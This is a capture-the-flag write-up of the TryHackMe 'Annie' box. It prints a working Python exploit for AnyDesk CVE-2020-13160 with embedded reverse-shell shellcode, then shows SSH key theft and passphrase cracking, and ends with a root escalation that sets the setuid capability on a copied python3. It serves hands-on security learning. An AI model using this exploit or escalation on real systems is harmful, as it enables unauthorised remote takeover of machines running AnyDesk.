Annie From TryHackme

Remote access comes in different flavors.

Hello Everyone I am Hac and Today we will be doing Annie which is a “medium” box on Tryhackme . I would rate it’s difficulty as “easy” Because you just need to find a right port to get initial foothold . So Without Wasting anytime let’s get started .

Nmap Scan

root@ip-10-10-98-158:~# sudo nmap -sV -p- 10.10.226.112 -oA nmap --min-rate 1000
Starting Nmap 7.60 ( https://nmap.org ) at 2022-07-06 15:18 BST
Nmap scan report for ip-10-10-226-112.eu-west-1.compute.internal (10.10.226.112)
Host is up (0.00042s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE         VERSION
22/tcp    open  ssh             OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
7070/tcp  open  ssl/realserver?
40293/tcp open  tcpwrapped
MAC Address: 02:39:05:FF:91:67 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 150.83 seconds

We don’t know much about the port 7070 and 40293 . So I did a quick Google search and found that port 7070 usually run any-desk , Which is a Remote access software .

Port 7070 (tcp/udp)

After That I searched for exploit related to any-desk software. CVE-2020–13160 was first ranked in google search, So I thought to give it a try .

Offensive Security's Exploit Database Archive

I used this exploit with a Small modification ( you need to change ip address as well as shellcode.

#!/usr/bin/env python
import struct
import socket
import sys
ip = 'IP address' #change this
port = 50001
def gen_discover_packet(ad_id, os, hn, user, inf, func):
  d  = chr(0x3e)+chr(0xd1)+chr(0x1)
  d += struct.pack('>I', ad_id)
  d += struct.pack('>I', 0)
  d += chr(0x2)+chr(os)
  d += struct.pack('>I', len(hn)) + hn
  d += struct.pack('>I', len(user)) + user
  d += struct.pack('>I', 0)
  d += struct.pack('>I', len(inf)) + inf
  d += chr(0)
  d += struct.pack('>I', len(func)) + func
  d += chr(0x2)+chr(0xc3)+chr(0x51)
  return d
#change this 
#msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.y.y LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode
shellcode =  b""
shellcode += b"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48"
shellcode += b"\x8d\x05\xef\xff\xff\xff\x48\xbb\x63\x40\x04"
shellcode += b"\x9d\x65\x60\xc6\xfb\x48\x31\x58\x27\x48\x2d"
shellcode += b"\xf8\xff\xff\xff\xe2\xf4\x09\x69\x5c\x04\x0f"
shellcode += b"\x62\x99\x91\x62\x1e\x0b\x98\x2d\xf7\x8e\x42"
shellcode += b"\x61\x40\x15\xc1\x6f\x6a\xa4\x65\x32\x08\x8d"
shellcode += b"\x7b\x0f\x70\x9c\x91\x49\x18\x0b\x98\x0f\x63"
shellcode += b"\x98\xb3\x9c\x8e\x6e\xbc\x3d\x6f\xc3\x8e\x95"
shellcode += b"\x2a\x3f\xc5\xfc\x28\x7d\xd4\x01\x29\x6a\xb2"
shellcode += b"\x16\x08\xc6\xa8\x2b\xc9\xe3\xcf\x32\x28\x4f"
shellcode += b"\x1d\x6c\x45\x04\x9d\x65\x60\xc6\xfb"
print('sending payload ...')
p = gen_discover_packet(4919, 1, '\x85\xfe%1$*1$x%18x%165$ln'+shellcode, '\x85\xfe%18472249x%93$ln', 'ad', 'main')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(p, (ip, port))
s.close()
print('reverse shell should connect within 5 seconds')

I was wondering about the port 50001 . We have not found this port in our nmap scan , I ran nmap twice but no luck with that . Again I ran Nmap UDP scan and I got that port .

Let’s run our exploit . Make sure that you have made proper changes in your exploit script and your netcat listener is turned on .

And boom I got shell ………

After that I copied the content of /home/annie/.ssh/id_rsa to our local machine . I tried to login but we need a passphrase which we don’t have . I used ssh2john and john the ripper to get the passphrase .

Then I cracked that Hash With John .

Now we can ssh into the box (make sure that proper permission is give to id_rsa file chmod 600 ) .

It’s time to escalate our privilege to root user …………………….

We can use setcap capability to escalate our privilege to root user .

Steps to get root :-

1:- Copy python3 to /tmp or any other dir .

cp /usr/bin/python3 .

2:- enable the capability

$ /sbin/setcap cap_setuid+ep /tmp/python3

3:- running python

$ ./python3 -c "import os;os.setuid(0);os.system('/bin/bash')"

And we finally got shell as root user !!!!

I hope you liked this write-up . If you have any question you can ask me over twitter https://twitter.com/Hac10101